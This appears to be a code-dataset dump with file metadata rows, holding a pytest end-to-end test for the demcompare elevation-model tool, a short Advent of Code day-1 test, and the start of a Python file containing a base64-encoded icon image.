Test that the outputs given by the Demcompare execution
of data/standard_roi/input/test_config.json are the same
as the reference ones in data/standard_roi/ref_output/
"""
# Get "standard_roi" test root data directory absolute path
test_data_path = demcompare_test_data_path("standard_roi")
# Load "standard_roi" demcompare config from input/test_config.json
test_cfg_path = os.path.join(test_data_path, "input/test_config.json")
test_cfg = read_config_file(test_cfg_path)
# Get "standard_roi" demcompare reference output path for
test_ref_output_path = os.path.join(test_data_path, "ref_output")
# Create temporary directory for test output
with TemporaryDirectory(dir=temporary_dir()) as tmp_dir:
# Modify test's output dir in configuration to tmp test dir
test_cfg["outputDir"] = tmp_dir
# Set a new test_config tmp file path
tmp_cfg_file = os.path.join(tmp_dir, "test_config.json")
# Save the new configuration inside the tmp dir
save_config_file(tmp_cfg_file, test_cfg)
# Run demcompare with "standard" configuration (and replace conf file)
demcompare.run(tmp_cfg_file)
# Now test demcompare output with test ref_output:
# TEST JSON CONFIGURATION
# Check initial config "test_config.json"
cfg_file = "test_config.json"
ref_output_cfg = read_config_file(
os.path.join(test_ref_output_path, cfg_file)
)
output_cfg = read_config_file(os.path.join(tmp_dir, cfg_file))
np.testing.assert_equal(
ref_output_cfg["stats_opts"], output_cfg["stats_opts"]
)
np.testing.assert_equal(
ref_output_cfg["plani_opts"], output_cfg["plani_opts"]
)
# Test final_config.json
cfg_file = get_out_file_path("final_config.json")
ref_output_cfg = read_config_file(
os.path.join(test_ref_output_path, cfg_file)
)
output_cfg = read_config_file(os.path.join(tmp_dir, cfg_file))
np.testing.assert_allclose(
ref_output_cfg["plani_results"]["dx"]["bias_value"],
output_cfg["plani_results"]["dx"]["bias_value"],
atol=TEST_TOL,
)
np.testing.assert_allclose(
ref_output_cfg["plani_results"]["dy"]["bias_value"],
output_cfg["plani_results"]["dy"]["bias_value"],
atol=TEST_TOL,
)
np.testing.assert_allclose(
ref_output_cfg["alti_results"]["dz"]["bias_value"],
output_cfg["alti_results"]["dz"]["bias_value"],
atol=TEST_TOL,
)
# TEST DIFF TIF
# Test initial_dh.tif
img = get_out_file_path("initial_dh.tif")
ref_output_data = os.path.join(test_ref_output_path, img)
output_data = os.path.join(tmp_dir, img)
assert_same_images(ref_output_data, output_data, atol=TEST_TOL)
# Test final_dh.tif
img = get_out_file_path("final_dh.tif")
ref_output_data = os.path.join(test_ref_output_path, img)
output_data = os.path.join(tmp_dir, img)
assert_same_images(ref_output_data, output_data, atol=TEST_TOL)
# TESTS CSV SNAPSHOTS
# Test initial_dem_diff_pdf.csv
file = get_out_file_path("initial_dem_diff_pdf.csv")
ref_output_csv = read_csv_file(os.path.join(test_ref_output_path, file))
output_csv = read_csv_file(os.path.join(tmp_dir, file))
np.testing.assert_allclose(ref_output_csv, output_csv, atol=TEST_TOL)
# Test final_dem_diff_pdf.csv
file = get_out_file_path("final_dem_diff_pdf.csv")
ref_output_csv = read_csv_file(os.path.join(test_ref_output_path, file))
output_csv = read_csv_file(os.path.join(tmp_dir, file))
np.testing.assert_allclose(ref_output_csv, output_csv, atol=TEST_TOL)
# Test snapshots/initial_dem_diff_cdf.csv
file = get_out_file_path("initial_dem_diff_cdf.csv")
ref_output_csv = read_csv_file(os.path.join(test_ref_output_path, file))
output_csv = read_csv_file(os.path.join(tmp_dir, file))
np.testing.assert_allclose(ref_output_csv, output_csv, atol=TEST_TOL)
# Test snapshots/final_dem_diff_cdf.csv
file = get_out_file_path("final_dem_diff_cdf.csv")
ref_output_csv = read_csv_file(os.path.join(test_ref_output_path, file))
output_csv = read_csv_file(os.path.join(tmp_dir, file))
np.testing.assert_allclose(ref_output_csv, output_csv, atol=TEST_TOL)
# TEST CSV STATS
# Test stats/slope/stats_results_standard.csv
file = "stats/slope/stats_results_standard.csv"
ref_output_csv = read_csv_file(os.path.join(test_ref_output_path, file))
output_csv = read_csv_file(os.path.join(tmp_dir, file))
np.testing.assert_allclose(ref_output_csv, output_csv, atol=TEST_TOL)
# Test stats/slope/stats_results_coherent-classification.csv
file = "stats/slope/stats_results_coherent-classification.csv"
ref_output_csv = read_csv_file(os.path.join(test_ref_output_path, file))
output_csv = read_csv_file(os.path.join(tmp_dir, file))
np.testing.assert_allclose(ref_output_csv, output_csv, atol=TEST_TOL)
@pytest.mark.end2end_tests
def test_demcompare_with_classification_layer():
"""
Demcompare with classification layer main end2end test.
Test that the outputs given by the Demcompare execution
of data/classification_layer/input/test_config.json are
the same as the reference ones
in data/classification_layer/ref_output/
"""
# Get "classification_layer" test root data directory absolute path
test_data_path = demcompare_test_data_path("classification_layer")
# Load "classification_layer" demcompare config from input/test_config.json
test_cfg_path = os.path.join(test_data_path, "input/test_config.json")
test_cfg = read_config_file(test_cfg_path)
# Modify test's classification layer path to its complete path
classif_layer_path = os.path.join(
"input",
test_cfg["stats_opts"]["classification_layers"]["Status"]["dsm"],
)
test_cfg["stats_opts"]["classification_layers"]["Status"][
"dsm"
] = os.path.join(test_data_path, classif_layer_path)
# Get "classification_layer" demcompare reference output path for
test_ref_output_path = os.path.join(test_data_path, "ref_output")
# Create temporary directory for test output
with TemporaryDirectory(dir=temporary_dir()) as tmp_dir:
# Modify test's output dir in configuration to tmp test dir
test_cfg["outputDir"] = tmp_dir
# Set a new test_config tmp file path
tmp_cfg_file = os.path.join(tmp_dir, "test_config.json")
# Save the new configuration inside the tmp dir
save_config_file(tmp_cfg_file, test_cfg)
# Run demcompare with "standard" configuration (and replace conf file)
demcompare.run(tmp_cfg_file)
# Now test demcompare output with test ref_output:
# TEST JSON CONFIGURATION
# Check initial config "test_config.json"
cfg_file = "test_config.json"
ref_output_cfg = read_config_file(
os.path.join(test_ref_output_path, cfg_file)
)
output_cfg = read_config_file(os.path.join(tmp_dir, cfg_file))
np.testing.assert_equal(
ref_output_cfg["stats_opts"]["classification_layers"]["Status"][
"classes"
],
output_cfg["stats_opts"]["classification_layers"]["Status"][
"classes"
],
)
np.testing.assert_equal(
ref_output_cfg["plani_opts"], output_cfg["plani_opts"]
)
# Test final_config.json
cfg_file = get_out_file_path("final_config.json")
ref_output_cfg = read_config_file(
os.path.join(test_ref_output_path, cfg_file)
)
output_cfg = read_config_file(os.path.join(tmp_dir, cfg_file))
np.testing.assert_allclose(
ref_output_cfg["plani_results"]["dx"]["bias_value"],
output_cfg["plani_results"]["dx"]["bias_value"],
atol=TEST_TOL,
)
np.testing.assert_allclose(
ref_output_cfg["plani_results"]["dy"]["bias_value"],
output_cfg["plani_results"]["dy"]["bias_value"],
atol=TEST_TOL,
)
np.testing.assert_allclose(
ref_output_cfg["alti_results"]["dz"]["bias_value"],
output_cfg["alti_results"]["dz"]["bias_value"],
atol=TEST_TOL,
)
# TEST DIFF TIF
# Test initial_dh.tif
img = get_out_file_path("initial_dh.tif")
ref_output_data = os.path.join(test_ref_output_path, img)
output_data = os.path.join(tmp_dir, img)
assert_same_images(ref_output_data, output_data, atol=TEST_TOL)
# Test final_dh.tif
img = get_out_file_path("final_dh.tif")
ref_output_data = os.path.join(test_ref_output_path, img)
output_data = os.path.join(tmp_dir, img)
assert_same_images(ref_output_data, output_data, atol=TEST_TOL)
# TEST SLOPE STATS
# Test stats/slope/stats_results_standard.csv
file = "stats/slope/stats_results_standard.csv"
ref_output_csv = read_csv_file(os.path.join(test_ref_output_path, file))
output_csv = read_csv_file(os.path.join(tmp_dir, file))
np.testing.assert_allclose(ref_output_csv, output_csv, atol=TEST_TOL)
# Test stats/slope/stats_results_coherent-classification.csv
file = "stats/slope/stats_results_coherent-classification.csv"
ref_output_csv = read_csv_file(os.path.join(test_ref_output_path, file))
output_csv = read_csv_file(os.path.join(tmp_dir, file))
np.testing.assert_allclose(ref_output_csv, output_csv, atol=TEST_TOL)
# Test dsm_support_map_rectif.tif
img = "stats/slope/dsm_support_map_rectif.tif"
ref_output_data = os.path.join(test_ref_output_path, img)
output_data = os.path.join(tmp_dir, img)
assert_same_images(ref_output_data, output_data, atol=TEST_TOL)
# Test ref_support_map_rectif.tif
img = "stats/slope/ref_support_map_rectif.tif"
ref_output_data = os.path.join(test_ref_output_path, img)
output_data = os.path.join(tmp_dir, img)
assert_same_images(ref_output_data, output_data, atol=TEST_TOL)
# TEST STATUS CLASSIFICATION LAYER STATS
# Test stats/Status/stats_results_standard.csv
file = "stats/Status/stats_results_standard.csv"
ref_output_csv = read_csv_file(os.path.join(test_ref_output_path, file))
output_csv = read_csv_file(os.path.join(tmp_dir, file))
np.testing.assert_allclose(ref_output_csv, output_csv, atol=TEST_TOL)
# Test dsm_support_map_rectif.tif
img = "stats/Status/dsm_support_map_rectif.tif"
ref_output_data = os.path.join(test_ref_output_path, img)
output_data = os.path.join(tmp_dir, img)
assert_same_images(ref_output_data, output_data, atol=TEST_TOL)
# TEST FUSION_LAYER STATS
# Test stats/fusion_layer/stats_results_standard.csv
file = "stats/fusion_layer/stats_results_standard.csv"
ref_output_csv = read_csv_file(os.path.join(test_ref_output_path, file))
output_csv = read_csv_file(os.path.join(tmp_dir, file))
np.testing.assert_allclose(ref_output_csv, output_csv, atol=TEST_TOL)
# Test dsm_fusion_layer.tif
img = "stats/fusion_layer/dsm_fusion_layer.tif"
ref_output_data = os.path.join(test_ref_output_path, img)
output_data = os.path.join(tmp_dir, img)
assert_same_images(ref_output_data, output_data, atol=TEST_TOL)
| 40.45
| 80
| 0.689408
| 2,993
| 21,034
| 4.476779
| 0.066154
| 0.09135
| 0.063438
| 0.051198
| 0.889171
| 0.888723
| 0.881633
| 0.870065
| 0.843347
| 0.831928
| 0
| 0.000909
| 0.215175
| 21,034
| 519
| 81
| 40.527938
| 0.810758
| 0.217267
| 0
| 0.753378
| 0
| 0
| 0.137903
| 0.071319
| 0
| 0
| 0
| 0
| 0.172297
| 1
| 0.010135
| false
| 0
| 0.027027
| 0
| 0.037162
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
298fa938d8cdc21a1843fab0e44b9f404f660e1e
| 212
|
py
|
Python
|
aoc_2021/test/day1_test.py
|
akohen/AdventOfCode
|
ac4194670d8a2af5357cb1f2e1d3f37df1f0a13e
|
[
"MIT"
] | null | null | null |
aoc_2021/test/day1_test.py
|
akohen/AdventOfCode
|
ac4194670d8a2af5357cb1f2e1d3f37df1f0a13e
|
[
"MIT"
] | null | null | null |
aoc_2021/test/day1_test.py
|
akohen/AdventOfCode
|
ac4194670d8a2af5357cb1f2e1d3f37df1f0a13e
|
[
"MIT"
] | null | null | null |
from aoc_2021.src import day1
def test_phase1():
assert day1.phase1([199,200,208,210,200,207,240,269,260,263]) == 7
def test_phase2():
assert day1.phase2([199,200,208,210,200,207,240,269,260,263]) == 5
| 26.5
| 70
| 0.693396
| 40
| 212
| 3.6
| 0.55
| 0.097222
| 0.125
| 0.166667
| 0.416667
| 0.416667
| 0.416667
| 0.416667
| 0.416667
| 0.416667
| 0
| 0.392473
| 0.122642
| 212
| 7
| 71
| 30.285714
| 0.38172
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.4
| 1
| 0.4
| true
| 0
| 0.2
| 0
| 0.6
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
4b0e6a466e3c1b3b54872708ef96efe0e8a457fb
| 96,033
|
py
|
Python
|
icon.py
|
huahuab/QQ_History_Backup
|
d12c22cdbb77cf6ab5355827f8fbe06668ec600b
|
[
"MIT"
] | 139
|
2021-07-10T12:49:17.000Z
|
2022-03-31T09:28:58.000Z
|
icon.py
|
huahuab/QQ_History_Backup
|
d12c22cdbb77cf6ab5355827f8fbe06668ec600b
|
[
"MIT"
] | 15
|
2020-05-22T11:53:04.000Z
|
2021-06-21T18:18:38.000Z
|
icon.py
|
huahuab/QQ_History_Backup
|
d12c22cdbb77cf6ab5355827f8fbe06668ec600b
|
[
"MIT"
] | 21
|
2021-07-24T13:02:44.000Z
|
2022-03-17T07:04:53.000Z
|
ico = '''AAABAAEAgIAAAAEAIAAoCAEAFgAAACgAAACAAAAAAAEAAAEAIAAAAAAAAAABABMLAAATCwAAAAAAAAAAAAD///8A////AP///wD///8A////AP///wD///8A////AP///wDd3d0A3d3dAN3d3QDd3d0A3d3dAN3d3QDd3d0A3d3dAN3d3QDd3d0A3d3dANzc3ADY2NgA1NTUANTU1ADV1dUA1tbWANbW1gDU1NQA1tbWANTU1AvV1dUn1dXVVtjY2JDPz8+Azs7OptDQ0OPLy8vwxcXF7cPDw+3Dw8Ptw8PD7cXFxe3JycnyzMzM0MzMzJLQ0NCF2NjYjM/PzzrR0dEi29vbJdPT0wDZ2dkAzc3NANLS0gDU1NQAzc3NANjY2ADS0tIAzs7OANjY2ADOzs4AzMzMAM/PzwDQ0NAA0NDQANDQ0ADQ0NAAzs7OAM3NzQDT09MA2dnZAM3NzQDQ0NAA2NjYANDQ0ADW1tYA09PTANXV1QDW1tYA19fXCtnZ2STU1NQ32dnZc9TU1IrOzs6C0NDQws7OzvLHx8fuxcXF7cPDw+3ExMTtxMTE7cfHx+3MzMz1zMzMqs7OzobT09OG2trajtPT0zrb29sm2NjYANfX1wDV1dUA1tbWANLS0gDW1tYA1tbWANra2gDf398A39/fAN/f3wDf398A39/fAN/f3wDf398A39/fAN/f3wDf398A39/fAN/f3wDf398A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AN3d3QDd3d0A3d3dAN3d3QDd3d0A3d3dAN3d3QDd3d0A3d3dAN3d3QDd3d0A3NzcANjY2ADU1NQA1NTUANXV1QDX19cA2NjYH9XV1UXU1NRrz8/Pk8zMzMHGxsblwMDA/7q6uv+2trb/sLCw/6urrP+np6j/paWm/6Wlpf+lpab/p6en/6qqqv+vr7D/tbW2/7q6uv+/wMD/w8PDz8fHx7rQ0NC+z9DQetbW1mjPz88x1NTUJdbW1hLOzs4A2dnZANLS0gDOzs4A2NjYAM7OzgDMzMwAz8/PANDQ0ADQ0NAA0NDQANDQ0ADOzs4Azc3NANPT0wDZ2dkAzc3NANDQ0ADZ2dkA0dHRANjY2BjV1dUx1tbWVtTU1GbR0dGQz8/PvcjIyMzExMT5vb2+/7m5uf+zs7T/rq6u/6qrq/+np6f/paWl/6Wlpf+lpaX/p6io/6ysrf+ysrP/uLi4/729vf/CwsL/x8fH0tHR0cDU1NR/1tbWUtfX1yjX19cA0tLSANbW1gDW1tYA2traAN/f3wDf398A39/fAN/f3wDf398A39/fAN/f3wDf398A39/fAN/f3wDf398A39/fAN/f3wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A3d3dAN3d3QDd3d0A3d3dAN3d3QDd3d0A3d3dAN3d3QDd3d0A3d3dAN3d3QDc3NwA2NjYANTU1ADU1NQA1tbWK9XV1XLPz8+2xsbG5r6+vv+0tLT/q6ur/6OjpP+bnJv/mJiX/5aWk/+TkY7/kY+K/5COiP+OjIb/jYuF/42Lh/+PjYj/kY+K/5STjv+ZmJP/np2X/6Gfm/+lpaL/qamn/62trf+3trf/vr6//8PDw8zJycm9zc3Npc3NzWrX19do1dXVTdDQ0CTa2toiz8/PAM3NzQDQ0NAA0dHRANHR0QDR0dEA0dHRAM/PzwDOzs4A1NTUBNvb2yjQ0NAk0dHRQNbW1mrOzs55z8/PrcnJyc/Dw8P9vLy9/7W1tf+vrq7/qqqn/6WkoP+hoJr/nZyX/5iXkv+Uk43/kpCL/4+NiP+Ni4b/jYuG/46Lhv+PjYf/kY+L/5OSkP+WlpX/mZmZ/56env+np6f/sLCw/7u7u//ExMT4zs7OwtTU1IHU1NQ119fXANbW1gDa2toA39/fAN/f3wDf398A39/fAN/f3wDf398A39/fAN/f3wDf398A39/fAN/f3wDf398A39/fAP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wDd3d0A3d3dAN3d3QDd3d0A3d3dAN3d3QDd3d0A3d3dAN3d3QDd3d0A3d3dANzc3ADY2NgA1dXVEdXV1XPNzc3EwMDA/7Kysv+lpab/nJyd/5WVlf+RkIz/joyG/4qHgP+Fgnz/fn16/3Z3ef9xcnb/a2x0/2Roc/9gY3D/XGBx/1tfcf9cX3H/Y2Ry/2lqdP9ycnr/eXl+/4GBg/+LjIj/lJSO/5yalf+gn5r/pKOi/6enp/+urq//uLi4/7+/v//FxcXvxsbGvM/Pz7jMzMx4y8vLaM7OzmjQ0NBoz8/PaM/Pz2jQ0NBozs7OaM3NzWrOzs6Lz8/PwcbGxrzCwsLdvr6+/7e3t/+urq//p6em/6Khnv+fn5n/m5qU/5STj/+JiYj/f3+C/3d3ff9ubnf/aGlz/2Fjcv9dX3H/W19x/15hcP9iZXL/Zmpz/2xudf9yc3f/eHl5/4KAe/+IhH7/jIqD/5COif+Uk5H/mpqa/6Skpf+xsbH/vr6+/8rKytDU1NSA19fXJdra2gDf398A39/fAN/f3wDf398A39/fAN/f3wDf398A39/fAN/f3wDf398A39/fAN/f3wDf398A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AN3d3QDd3d0A3d3dAN3d3QDd3d0A3d3dAN3d3QDd3d0A3d3dAN3d3QDd3d0A3NzcANjY2BHS0tKex8fH/7Ozs/+ioqP/lpaW/4+Oiv+MiYL/hIF7/3d3eP9ma3X/V15z/0dScf86SHL/L0Bz/yY5c/8fNHT/GjJ1/xkvd/8VLHb/Eylz/xMocP8YKm7/Gyhp/yApZP8nLGD/Mzdi/0FEZv9SU2v/Zmd0/3h5fv+JiIT/kI+J/5KRjv+VlJT/mZmZ/5+fn/+lpaX/q6ur/7Kysv+1tbX/ubm5/7m5uf+6urr/urq6/7m5uf+5ubn/tra2/7Kysv+srKz/pqam/56en/+YmJj/lpWT/5STjf+Pj4j/g4OD/3Jzev9eXnH/S01q/zs+Zf8tMmH/Iytj/x4oZv8aKWv/FSdv/xMncf8TKXT/Fy12/xkwdv8cM3T/IDVy/yg7cv8zRXL/QE5y/01Ycv9dZXT/bXB3/359ev+LiIH/kY+K/5aVlP+goKH/r6+v/8LCwv/R0dG+29vbVd/f3wDf398A39/fAN/f3wDf398A39/fAN/f3wDf398A39/fAN/f3wDf398A39/fAN/f3wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A3d3dAN3d3QDd3d0A3d3dAN3d3QDd3d0A3d3dAN3d3QDd3d0A3d3dAN3d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/P8JmPv/CZn8/wmb/P8Jm/z/CZ78/wif/P8In/z/CJ/7/wie+v8Infr/CZr6/wmX+v8Kk/v/Co/+/wyH/f8Me/T/CWff/wNKvP8JNpD/M0mC/4eMmf+9urX/y8vL/NjY2EjY2NgA2NjYANjY2ADY2NgA2NjYANjY2ADY2NgA2NjYANjY2ADY2NgA2NjYAP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wDZ2dkA2dnZANnZ2QDZ2dkA2dnZANnZ2QDZ2dkA2dnZANnZ2QDZ2dkA2traJdnY1eG5uLj/VWeQ/wkyjf8CTsT/C3Tv/w2H/f8Lkf3/Cpn6/wih+v8Hqvz/B7D9/wez/v8Htv//Brb//wa3//8Gtv//B7b//we1//8Hs/7/B7H+/wew//8Hr///B67//wev/v8Hq/7/BZL2/wSD8v8EgvL/BYDy/wV98f8FefD/BXbv/wV18f8Fdfn/BXb//wdn6/8EQbX/BR55/xcmbf9FTW//amxt/25ubv9tbm7/bW5u/21ubv9ub27/bm9t/1xgbv8sOG3/CRxu/wMtlv8FWdf/BXD4/wVz+f8EcfL/BHHt/wRz7v8Ede//BHbw/wR37/8Ed+//BYDy/wib+/8Jpv//CKT+/wil//8Ipv//CKb+/win//8Hqv//B6z//weu//8Hr///B7D//wev/v8Hrv7/B6z8/wio+/8Iovr/CZn6/wqS+/8Liv7/DHz2/whg2f8COqL/I0GF/5Wcq//Y1tDw29vaNtvb2gDb29oA29vaANvb2gDb29oA29vaANvb2gDb29oA29vaANvb2gDb29oA////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AOPi3gDj4t4A4+LeAOPi3gDj4t4A4+LeAOPi3gDj4t4A4+LeAOPi3gDl5N8O3dzZjoWQrP8IMI3/BFfQ/w2B/P8Lj/3/Cpj6/wmk+v8IsP3/Brj+/wa8//8Gvv//Bb///wW///8Fvv//Br3//wa8//8Gu///Brn//wa3//8Htf//B7P//wex//8HtP//B7X//wak+/8Dj/X/A4rz/wSI8/8EhvL/A4T0/wOG/f8Bh///AYX//wKA//8FdvX/CHDt/wxi1P8SOIj/EBZP/xsgTf9BPkb/SURE/0VAQv9FQEL/RUBC/0VBQv9JRUf/LjBN/wwVUv8NKXb/DFrM/wZy9v8Ddv7/AXv//wF9//8Cfv//A3v3/wR68P8Ee+//A37x/wN+8f8Ef/H/BZL4/wio//8Iq///CKj//win//8Iqf//B6z//wev//8Hsv//BrT//wa1//8Gt///Brj//wa3//8Gt///Brf//waz/v8Hr/7/CKb7/wia+f8JkPr/C4T8/wtt6f8APKb/NVGR/tDQ0MXh4N0N4eDcAOHg3ADh4NwA4eDcAOHg3ADh4NwA4eDcAOHg3ADh4NwA4eDcAOHg3AD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A6ObhAOjm4QDo5uEA6ObhAOjm4QDo5uEA6ObhAOjm4QDo5uEA6ObhAO3q4wDOz9RQOFea/QBCuP8NhP7/CJH7/wed+f8GrP3/Bbj+/wW+//8FwP//BcH//wXB//8Fwf//BcH//wXA//8Fv///Bb///wa9//8Gu///Brn//wa3//8HtP//B7T//wey//8Hpfz/BJL1/wOL8f8CjPT/AZL//wCX//8AlP//BIfy/wp00v8RXqr/FkyJ/xs8aP8aKkv/Fx84/xQVKP8TCRL/DQQO/w0CCP8QBQn/FgwQ/xYMEP8WDBD/FQoQ/w8FDP8IAAv/DAQR/w8QIf8OHjz/DiZN/xI4a/8STJH/Dl+3/wlx3P8Dgfj/AIr//wCK//8Chfr/A4Hx/wN+8P8DgvL/BZT3/wik/f8Iqv//CKv//wes//8Hr///BrL//wa1//8Gt///Brj//wa7//8Fu///Bbz//wW8//8FvP//Bbr//wS5//8EtP//BK39/wag+v8Hkvj/C4b9/wxp5P8FM5H+e4yzr8vR3gDJz90Ayc/dAMnP3QDJz90Ayc/dAMnP3QDJz90Ayc/dAMnP3QDJz90Ayc/dAP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wCfrMkAn6zJAJ+syQCfrMkAn6zJAJ+syQCfrMkAn6zJAJ+syQCfrMkAo6/KBYeWu2kUQ53+A2jl/wuP//8In/j/CbL8/we9//8Fwf//BMH//wPC//8ExP//BMb//wTG//8Fxv//BcX//wXD//8Fwv//BcD//wW+//8GvP//Brv//wa7//8Gs/7/BZ/5/wSP8/8Cj/r/AJb//wCV//8Ehuv/DWy4/xZTiP8ePFz/ISk6/xwVHf8WCAr/EwIB/x4KCP8vHBb/QTIu/1lMSP9sX1n/em5o/4J2cf+Pgnz/j4J9/4+Cff+Ognz/gnZy/3ptaP9sX1n/WEtD/0EwJ/8sHBX/Gg0K/w0DCP8ODRr/EyA4/xU5Y/8RVZf/CW7L/wOD9v8Ai///AIj//wOA9P8Df/D/BIr0/wab+v8IrP//B7T//wa2//8Gtv//Brj//wW6//8FvP//Bb///wXA//8Fwf//BMD//wK///8Fv///Cr///xC///8Vvf//Frf+/xGm+/8Kkfj/DH76/wNDrP8+XJ3Xx8/jHcPM4QDDzOEAw8zhAMPM4QDDzOEAw8zhAMPM4QDDzOEAw8zhAMPM4QDDzOEA////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////ADBTmgAwU5oAMFOaADBTmgAwU5oAMFOaADBTmgAwU5oAMFOaADBTmgAxU5oIKU2Weg1Jq/8Ke/X/E5n8/yC0+/8kyP7/Isz//x3K//8Vyf//DMn//wbJ//8Cyv//Asv//wTL//8Eyf//BMj//wXG//8Fw///BcD//wXA//8GwP//BrL7/wSe9/8Bk/3/AJb//wKP+v8LcsT/FlKG/yA1UP8mIi7/IRIV/xcEA/8YBAL/LRoZ/1BAPv96a2f/mY2H/7itpP/MwLX/1cq+/9/Sxf/n2s3/6t7R/+3f0f/s39L/7N/S/+vf0v/q3dH/59rN/97Rxv/Wyr7/y8C0/7mtof+bjYT/empj/1A/Ov8nFhP/EQIC/w0GCv8XHCv/GDhc/xFWmf8HdNj/AYf//wCG//8DgPb/BIPw/wWS9f8Gpvr/Brb+/wa+//8Fv///Bb///wXC//8Exf//BMb//wLH//8Fx///Dcj//xvL//8qzf//N87//z7O//87zP//Lbz+/xKe+f8Kg/n/B1PD/yxPl/WSpcs+kKLJAJCiyQCQoskAkKLJAJCiyQCQoskAkKLJAJCiyQCQoskAkKLJAJCiyQD///8A////AP///wD///8A////AP///wD///8A////AP